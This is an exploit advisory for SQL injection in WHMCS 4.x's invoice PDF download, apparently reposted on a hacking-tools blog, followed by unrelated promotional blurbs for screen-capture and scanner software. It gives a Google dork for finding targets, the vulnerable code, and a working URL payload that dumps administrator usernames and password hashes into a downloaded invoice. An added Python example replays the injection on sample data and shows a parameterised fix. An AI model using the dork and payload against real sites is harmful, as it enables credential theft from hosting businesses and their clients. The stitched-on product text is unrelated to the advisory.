WHMCS 4.x SQL Injection Vulnerability

# Title: WHMCS 4.x SQL Injection Vulnerability
# Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php"
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Date: 14/5/2013
# Vendor: http://www.whmcs.com
# Version: 4.5.2; prior versions should be affected too
# Tested on: Linux

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 SQL Injection Vulnerability in "/includes/invoicefunctions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    - Vulnerable Code Snippet :
   
      LINE 582: function pdfInvoice($id)
      LINE 583: {
      LINE 686: if ($CONFIG['GroupSimilarLineItems'])
      LINE 687: {
      LINE 688: $result = full_query('' . 'SELECT COUNT(*),id,type,relid,description,amount,taxed FROM tblinvoiceitems WHERE invoiceid=' . $id . ' GROUP BY `description`,`amount` ORDER BY id ASC');
      LINE 689: }
     
     As we can see, the $id argument of pdfInvoice() is used directly in the MySQL query without any sanitization, which leads directly to SQL injection.
     pdfInvoice() is called from "/dl.php" as follows:
   
   
      LINE 21: if ($type == 'i')
      LINE 22: {
      LINE 23: $result     = select_query('tblinvoices', '', array(
      LINE 24: 'id' => $id
      LINE 25: ));
      LINE 26: $data       = mysql_fetch_array($result);
      LINE 27: $invoiceid  = $data['id'];
      LINE 28: $invoicenum = $data['invoicenum'];
      LINE 29: $userid     = $data['userid'];
      LINE 30: if ((!$_SESSION['adminid'] && $_SESSION['uid'] != $userid))
      LINE 31: {
      LINE 32: downloadLogin();
      LINE 33: }
      LINE 34: if (!$invoicenum)
      LINE 35: {
      LINE 36: $invoicenum = $invoiceid;
      LINE 37: }
      LINE 38: require('includes/clientfunctions.php');
      LINE 39: require('includes/countries.php');
      LINE 40: require('includes/invoicefunctions.php');
      LINE 41: require('includes/tcpdf.php');
      LINE 42: $pdfdata = pdfInvoice($id);
      LINE 43: header('Pragma: public');
      LINE 44: header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
      LINE 45: header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
      LINE 46: header('Cache-Control: must-revalidate, post-check=0, pre-check=0, private');
      LINE 47: header('Cache-Control: private', false);
      LINE 48: header('Content-Type: application/octet-stream');
      LINE 49: header('Content-Disposition: attachment; filename="' . $invoicenum . '.pdf"');
      LINE 50: header('Content-Transfer-Encoding: binary');
      LINE 51: echo $pdfdata;
      LINE 52: exit();
      LINE 53: return 1;
      LINE 54: }
     
     
      As we can see at LINE 42, pdfInvoice() is called with the $id variable without any sanitization, and the generated invoice is then pushed to the browser as a PDF download,
      so whatever the injected query places in the description column is rendered into the downloaded file.
      Note also that the only access control on this path is the loose comparison at LINE 30 ($_SESSION['uid'] != $userid): if the tblinvoices lookup at LINES 23-26 returns no row for the injected value, $userid is empty and a visitor with no session uid compares equal to it. Whether that happens depends on how select_query() handles the value, which is not shown here.
   
      - Proof of Concept for Exploitation
   
        To Dump Administrator Credentials (user & pass):
     
        http://www.site.com/whmcs/dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
     
        ~ Result: the browser prompts to download the PDF invoice; open it and you should find the admin username and password hash inside :)
       
      - Precondition to Successfully Exploit the Vulnerability:
   
        The "Group Similar Line Items" option must be enabled under the Invoices settings in the WHMCS admin area (it is enabled by default), because the vulnerable query only runs inside the $CONFIG['GroupSimilarLineItems'] branch at LINE 686.
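The following is an added example, not code from the advisory or from WHMCS, that reproduces the injection against a throwaway SQLite database so the two halves of the bug can be seen side by side: the query built by string concatenation exactly as pdfInvoice() does, and the same query with the id bound as a parameter. The table layout, the rows, the admin name and the hash are constructed sample data; the payload is the advisory's, rewritten in SQLite syntax (|| in place of CONCAT(), a ':::' literal in place of 0x3a3a3a, which SQLite would read as an integer). Function names are the example's own.

```python
import sqlite3

# Constructed sample data standing in for the two WHMCS tables the advisory
# names (tblinvoiceitems, tbladmins). The column set matches the vulnerable
# SELECT in pdfInvoice(); the rows, the admin name and the hash are made up.
SCHEMA = """
CREATE TABLE tblinvoiceitems (
    id INTEGER PRIMARY KEY, invoiceid INTEGER, type TEXT, relid INTEGER,
    description TEXT, amount REAL, taxed INTEGER
);
CREATE TABLE tbladmins (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO tblinvoiceitems VALUES (1, 1, 'Hosting', 10, 'Starter plan', 9.99, 1);
INSERT INTO tblinvoiceitems VALUES (2, 1, 'Domain',  11, 'example.com',  4.00, 0);
INSERT INTO tblinvoiceitems VALUES (3, 2, 'Hosting', 12, 'Other client', 1.00, 0);
INSERT INTO tbladmins VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""

# The advisory's payload adapted to SQLite syntax: || replaces CONCAT() and the
# ':::' separator replaces 0x3a3a3a. The seven UNION columns match the seven
# columns of the original SELECT, the 'and 0=1' empties the legitimate result,
# and the trailing "-- " comments out the GROUP BY / ORDER BY tail of the query.
PAYLOAD = ("1 and 0=1 union select 1,2,3,4,username||':::'||password,6,7 "
           "from tbladmins -- ")


def connect():
    """In-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def invoice_items_vulnerable(conn, invoice_id):
    """Mirror of the GroupSimilarLineItems query in pdfInvoice(): the id is
    concatenated straight into the SQL text, exactly as '. $id .' does in PHP."""
    sql = ("SELECT COUNT(*),id,type,relid,description,amount,taxed "
           "FROM tblinvoiceitems WHERE invoiceid=" + str(invoice_id) +
           " GROUP BY description,amount ORDER BY id ASC")
    return conn.execute(sql).fetchall()


def invoice_items_hardened(conn, invoice_id):
    """Same query with the id passed as a bound parameter, so its text is
    never parsed as SQL. Casting to int first ((int)$id in PHP) works too."""
    sql = ("SELECT COUNT(*),id,type,relid,description,amount,taxed "
           "FROM tblinvoiceitems WHERE invoiceid=? "
           "GROUP BY description,amount ORDER BY id ASC")
    return conn.execute(sql, (invoice_id,)).fetchall()


def leaked_credentials(rows):
    """Pick out description cells carrying the username:::hash marker; this is
    the text that would be rendered into the downloaded invoice PDF."""
    return [r[4] for r in rows if isinstance(r[4], str) and ":::" in r[4]]


if __name__ == "__main__":
    db = connect()
    print("legit id 1 :", invoice_items_vulnerable(db, 1))
    print("injected   :", leaked_credentials(invoice_items_vulnerable(db, PAYLOAD)))
    print("hardened   :", invoice_items_hardened(db, PAYLOAD))
```

Running it shows why the PoC is shaped the way it is: the UNION must supply exactly seven columns because the original SELECT has seven, the credential string goes into the fifth position because that is the description column the PDF renders, and the closing comment absorbs the GROUP BY and ORDER BY that would otherwise follow the injected text. In the original the comment is "--" followed by the space that precedes GROUP BY, which is what MySQL requires after a double-dash comment. With the parameterised version the whole payload is compared as a single text value against invoiceid, matches nothing, and the query returns no rows.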

      - Credits:

        Ahmed Aboul-Ela - Information Security Consultant @ Starware Group


HyperCam 3.5.1310.24


HyperCam is powerful video capture software that records AVI movies (screencam) directly from your monitor, for software presentations, software training, demos, tutorials, and fun! HyperCam supports text annotations, sound, and screen notes (great for creating automated software demos!).
You can also select Frame rate and compression quality prior to video capture. This format can be played under Windows, as well as the Internet, unlike other programs that use proprietary formats that may need special viewers and be difficult, if not impossible, to edit.
HyperCam captures the action from your Windows screen and saves it to AVI (Audio-Video Interleaved) movie file. Sound from your system microphone is also recorded. Please note that HyperCam is not intended for re-recording of other video clips from the screen (e.g. playing in Media Player, RealVideo, QuickTime etc.), but rather for creating regular software presentations, tutorial, demos etc.


Acunetix Consultant Edition 9

Audit your website security with Acunetix Web Vulnerability Scanner. As many as 70% of web sites have vulnerabilities that could lead to the theft of sensitive corporate data such as credit card information and customer lists. Hackers are concentrating their efforts on web-based applications - shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access to backend corporate databases. Firewalls, SSL and locked-down servers are futile against web application hacking! Web application attacks, launched on port 80/443, go straight through the firewall, past operating system and network level security, and right into the heart of your application and corporate data. Tailor-made web applications are often insufficiently tested, have undiscovered vulnerabilities and are therefore easy prey for hackers.


Copyright © 2013 Hacking Tools and Tech eBooks Collection and Blogger Templates - Anime OST.